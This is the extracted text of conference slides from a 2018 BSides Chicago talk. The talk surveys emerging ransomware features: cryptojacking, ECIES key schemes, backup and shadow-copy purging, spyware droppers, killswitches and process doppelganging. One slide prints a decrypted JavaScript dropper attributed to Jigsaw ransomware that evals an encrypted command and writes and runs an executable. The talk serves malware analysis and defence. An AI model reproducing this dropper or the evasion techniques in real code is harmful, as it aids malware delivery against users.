Hipster Ransomware: Beyond Mere Encryption Pranshu Bajpai August 7, 2018 Bsides Chicago 2018 

Agenda 1. Introduction 2. Hipster Ransomware 3. Attributes Cryptojacking: Best of Both Worlds ECDH: Judging a Book by its Cover Purge Backups: The Whole Nine Yards Dropping Spyware: Adding Insult to Injury Stealing Social Engineering’s Thunder Killswitches: Blessing in Disguise Process Doppelganging: Hiding in Plain Sight 4. Conclusion 1 

Introduction 2 

About us Pranshu Bajpai PhD Candidate, Computer Science and Engineering, Michigan State University http://cse.msu.edu/~bajpaipr/ https://www.linkedin.com/in/pranshubajpai/ https://twitter.com/amirootyet Richard Enbody Associate Professor, Computer Science and Engineering, Michigan State University http://www.cse.msu.edu/~enbody/ 3 

Related work • Young and Yung first formally introduced the concept of cryptoviral extortions (modern ransomware) in 1996 • Young discusses ransomware and Microsoft’s CryptoAPI in 2006 • Kharraz et al. discover in 2015 that only 6% of 1, 359 of analyzed samples were actually effective 4 

The primary elements of a ransomware • Infiltrate • Acquire encryption secret (key) • Encrypt • Demand ransom 5 

Common hybrid cryptosystem in ransomware • Ransomware compromises host • Generates symmetric encryption key • Encrypts symmetric key with a hard-coded asymmetric key • Provides attacker a copy of encrypted symmetric key • Encrypts user data using the symmetric key • Destroys symmetric key on host • Displays ransom note 6 

Hipster Ransomware 7 

Hipster Ransomware: Contemporary Subculture Hipster Ransomware Ransomware variants with innovative features that offer competitive, strategic or operational advantage(s) to the ransomware developer Why? • Underground market can be competitive • Need for continuous innovation • Throw off malware analysts, even if briefly 8 

Attributes 9 

Attributes Cryptojacking: Best of Both Worlds 10 

Cryptojacking: Best of Both Worlds • Cryptojacking is on the rise • Bundle a mining routine with the ransomware Why? • Runs in the background, creates no “noise” • Especially favorable to ransomware developers in context of underdeveloped countries • At least some funds generated even when ransom is not paid • Cryptocurrencies such as Monero make it feasible to mine on an average processor 11 

Attributes ECDH: Judging a Book by its Cover 12 

ECDH: Judging a Book by its Cover (Image source: quora.com) About ECDH • Elliptic curves: y2 = x3 + ax + b • Elliptic-curve Diffie-Hellman • Generate shared secret over insecure channels • Use derived key symmetric to encrypt data Draw a line from a to b, and then continue the line. You intersect only one other point on the elliptic curve. Ransomware use Elliptic Curve Integrated Encryption Scheme or ECIES 13 

ECDH: Judging a Book by its Cover Consider scp192k1 deployed in Petya: Domain parameters over Finite field, F: (p, a, b, G, n, h) • Finite Field, p = 2192 − 232 − 212 − 28 − 27 − 26 − 23 − 21 • Curve: y2 = x3 + ax + b over F • Base point, G = 03DB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D • Order of G, n = FFFFFFFFFFFFFFFFFFFFFFFE26F2FC170F69466A74DEFD8D • Cofactor, h = 01 Domain parameters are public! 14 

ECDH: Judging a Book by its Cover Encryption steps taken by a ransomware to implement ECIES: • Domain parameters and a public key, P, ships hard-coded with the binary • Secret integar, s, is kept safe with the attacker 15 

ECDH: Judging a Book by its Cover Upon infection • Generate random integar, t, using /dev/urandom or CryptGenRandom • Q = [t]G • h = H([t]P) ← encryption key! • Encrypt using h • Purge t and h from host Upon receiving payment • Demand Q from host • [s]Q = [t]P ← This important property allows deriving the same point as used on host • h = H([s]Q) • Attacker sends back h to victim 16 

ECDH: Judging a Book by its Cover Advantages for the attacker • Better for marketing • ECDH not as closely scrutinized as the popular RSA • Does not depend on resident CryptoAPIs to generate symmetric key 17 

ECDH: Judging a Book by its Cover Advantages for the attacker • Better for marketing • ECDH not as closely scrutinized as the popular RSA • Does not depend on resident CryptoAPIs to generate symmetric key • Offers the same security as RSA for a smaller key-size 17 

Attributes Purge Backups: The Whole Nine Yards 18 

Purge Backups: The Whole Nine Yards Backups on host • Available as a mapped drive on the network AND/OR • Windows default Shadow Volume snapshots of C: drive used by ‘System Restore’ AND/OR • Synced to the cloud using a client Ransomware • explicitly hunt for and encrypt network shares • purge VSS files on host • abuse sync clients of cloud services to encrypt files stored in cloud 19 

Purge Backups: The Whole Nine Yards 20 

Purge Backups: The Whole Nine Yards 21 

Purge Backups: The Whole Nine Yards WNetAddConnection2W used to map network shares 22 

Attributes Dropping Spyware: Adding Insult to Injury 23 

Dropping Spyware: Adding Insult to Injury • Drop other malware such as trojans to spy on users • Attack on data availability and confidentiality • Not good for reputation hence not a common practice yet 24 

Dropping Spyware: Adding Insult to Injury • Drop other malware such as trojans to spy on users • Attack on data availability and confidentiality • Not good for reputation hence not a common practice yet • No indication that spyware is removed after payment 24 

Dropping Spyware: Adding Insult to Injury 1 f u n c t i o n NWvQtGjjfQX ( ) { 2 var data pn = " TVrDiQNMSFE (...) QQURE" ; 3 4 var cmd = "U2FsdGVkX1/LHQl+aIAo/ hXHDEI5YmZZtBIcL ..." ; 5 var dec cmd = CryptoJS . AES . decrypt (cmd , key cmd ) ; 6 dec cmd = CryptoJS . enc . Utf8 . s t r i n g i f y ( dec cmd ) ; 7 e v a l ( dec cmd ) ; 8 return 0; 9 } 10 11 . . . // decrypts to the following code // ... 12 var f l o = new ActiveXObject ( "ADODB.Stream" ) ; 13 var runer = WScript . CreateObject ( "WScript.Shell" ) ; 14 var wher = runer . S p e c i a l F o l d e r s ( " MyDocuments " ) ; 15 wher = wher + "\\" + "st.exe" ; 16 f l o . CharSet = "437" ; 17 f l o . Open () ; 18 var pny = data pn . r e p l a c e (/NMSIOP/g , "A" ) ; 19 var pny ar = CryptoJS . enc . Base64 . parse ( pny ) ; 20 var pny dec = pny ar . t o S t r i n g ( CryptoJS . enc . Utf8 ) ; 21 f l o . P o s i t i o n = 0 ; 22 f l o . SetEOS ; 23 f l o . WriteText ( pny dec ) ; 24 f l o . SaveToFile ( wher , 2) ; 25 f l o . Close ; 26 wher = "\"" + wher + "\"" ; 27 runer . Run( wher ) ; Key and IV embedded in the Jigsaw ransomware 25 

Dropping Spyware: Adding Insult to Injury Trojan dropper observed in RAA ransomware 26 

Attributes Stealing Social Engineering’s Thunder 27 

Stealing Social Engineering’s Thunder • Phishing has been the predominant attack vector among malware • Relies on exploiting human gullibility • Attackers are moving on to more efficient attack vectors • WannaCry exploits EternalBlue • SamSam exploits weak RDP protection 28 

Stealing Social Engineering’s Thunder WannaCry begins scanning port 445 to exploit EternalBlue 29 

Attributes Killswitches: Blessing in Disguise 30 

Blessing in Disguise Killswitch A control that effectively neutralizes the ransomware such that it never executes its encryption routine. • Gained widespread attention with WannaCry • Allows ransomware operators some form of control over the campaign(?) • Can be exploited by security researchers if outside the attacker’s control • NotPetya checks for perfc file in C:\Windows\... ← not really a killswitch • Will we observe more ransomware killswitches in future? 31 

Attributes Process Doppelganging: Hiding in Plain Sight 32 

Process Doppelganging: Hiding in Plain Sight SynAck Ransomware • First ransomware discovered to use process doppelganging • Uses the technique to evade detection by antivirus solutions • Avoids making unexpected changes to the filesystem • Doesn’t execute if run from unexpected locations • Doesn’t execute if keyboard setting on host is ’Cyrillic’ • Primary attack vector is RDP 33 

Process Doppelganging: Hiding in Plain Sight Process Doppelganging • First discussed in Black Hat Europe, December 2017 by enSilo team • Overwrite an executable with malicious code Ransomware executes in context of legitimate process =⇒ AV will not detect malicious code! 34 

Process Doppelganging: Hiding in Plain Sight Process Doppelganging • First discussed in Black Hat Europe, December 2017 by enSilo team • Overwrite an executable with malicious code • Load malicious executable Ransomware executes in context of legitimate process =⇒ AV will not detect malicious code! 34 

Process Doppelganging: Hiding in Plain Sight Process Doppelganging • First discussed in Black Hat Europe, December 2017 by enSilo team • Overwrite an executable with malicious code • Load malicious executable • Rollback to original Ransomware executes in context of legitimate process =⇒ AV will not detect malicious code! 34 

Process Doppelganging: Hiding in Plain Sight Process Doppelganging • First discussed in Black Hat Europe, December 2017 by enSilo team • Overwrite an executable with malicious code • Load malicious executable • Rollback to original • Execute malicious code Ransomware executes in context of legitimate process =⇒ AV will not detect malicious code! 34 

Conclusion 35 

Conclusion • Ransomware innovate and evolve—just like any other products • What is hipster today might become a trend tomorrow • Early anticipation of future malware trends help create better responses • 36 

Questions • BSides Chicago organizers • For the support! • Michigan State infosec team • For continuous help and support! Questions @amirootyet 37